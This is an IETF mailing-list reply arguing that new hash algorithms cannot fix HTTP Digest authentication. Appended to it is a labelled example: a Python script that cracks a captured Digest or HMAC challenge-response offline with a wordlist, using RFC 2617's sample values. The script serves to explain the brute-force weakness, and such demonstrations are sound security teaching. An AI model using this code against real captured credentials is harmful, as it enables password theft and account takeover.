Re: Last Call: draft-bryan-http-digest-algorithm-values-update (Additional Hash Algorithms for HTTP Instance Digests) to Informational RFC

Changing the digest algorithm in DIGEST is pointless.

If you are going to make changes to align the scheme with modern
practice you would replace the digest function with a MAC such as
HMAC.

But there really is no point in doing that because

1) Implementations would still be vulnerable to downgrade attacks.
This is actually a problem with BASIC continuing to exist.

2) The on-the-wire protocol is subject to a brute force attack over
the space of possible passwords. Unless we can persuade people to use
passwords longer than 25 characters that is going to be the weakest
point in the system no matter what the algorithm is.

3) RSA is now out of patent; that was the main constraint on DIGEST:
the algorithms had to be unencumbered.


I would be more interested in doing something like using self-signed
SSL certs, putting a digest of the cert into the DNS and hoping that
DNSSEC is un-doofused some time this century.

Received on Thursday, 10 December 2009 03:12:12 UTC
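The brute force point made in the message above, as an added example that is not part of the original post: an eavesdropper who records one Digest exchange can recompute the RFC 2617 response for candidate passwords offline, and swapping MD5 for a MAC keyed with the password changes nothing, because every other input to the MAC is visible on the wire. The challenge parameters (user Mufasa, realm testrealm@host.com, nonce, cnonce, nc, URI) are the ones from the worked example in RFC 2617 section 3.5; the `hmac_response` construction is a hypothetical illustration, not any standardised scheme, and the wordlist is constructed for the demonstration.

```python
"""Offline dictionary attack on an observed HTTP Digest exchange (RFC 2617,
algorithm=MD5, qop=auth) and on a hypothetical HMAC-based replacement.
Example code, not from the original post or the draft under discussion."""
import hashlib
import hmac
from typing import Callable, Iterable, Optional

# Constructed capture of one challenge/response. The field values are the
# ones used in the worked example of RFC 2617 section 3.5; the password is
# what the attacker does not know and wants to recover.
CAPTURE = {
    "username": "Mufasa",
    "realm": "testrealm@host.com",
    "method": "GET",
    "uri": "/dir/index.html",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093",
    "nc": "00000001",
    "cnonce": "0a4f113b",
    "qop": "auth",
}


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def digest_response(password: str, c: dict = CAPTURE) -> str:
    """RFC 2617 Digest response with algorithm=MD5 and qop=auth:
    response = MD5(HA1:nonce:nc:cnonce:qop:HA2), where
    HA1 = MD5(username:realm:password) and HA2 = MD5(method:uri)."""
    ha1 = _md5(f"{c['username']}:{c['realm']}:{password}")
    ha2 = _md5(f"{c['method']}:{c['uri']}")
    return _md5(f"{ha1}:{c['nonce']}:{c['nc']}:{c['cnonce']}:{c['qop']}:{ha2}")


def hmac_response(password: str, c: dict = CAPTURE) -> str:
    """Hypothetical MAC-based variant (an assumption for illustration, not a
    standard): HMAC-SHA256 keyed with the password over the same challenge
    fields. Every input except the password is observable on the wire, so the
    eavesdropper can evaluate it for candidate passwords just as easily."""
    fields = ("username", "realm", "method", "uri", "nonce", "nc", "cnonce", "qop")
    msg = ":".join(c[k] for k in fields).encode("utf-8")
    return hmac.new(password.encode("utf-8"), msg, hashlib.sha256).hexdigest()


def crack(observed: str, wordlist: Iterable[str],
          compute: Callable[[str], str]) -> Optional[str]:
    """Recompute the response for each candidate and compare with the value
    seen on the wire. No request ever reaches the server, so account lockout
    and rate limiting cannot interfere; only the password space matters."""
    for candidate in wordlist:
        if hmac.compare_digest(compute(candidate), observed):
            return candidate
    return None


# Constructed wordlist standing in for a real dictionary.
WORDLIST = ["password", "hunter2", "Circle of Life", "Circle Of Life", "letmein"]


if __name__ == "__main__":
    secret = "Circle Of Life"  # the password from the RFC 2617 example
    for name, fn in (("Digest/MD5", digest_response), ("HMAC-SHA256", hmac_response)):
        observed = fn(secret)  # what a passive observer records
        print(f"{name}: observed={observed} recovered={crack(observed, WORDLIST, fn)!r}")
```

The point to take from the two runs is that they behave identically: the attack cost is the size of the candidate password space times one hash (or one HMAC) per guess, regardless of which algorithm the scheme names.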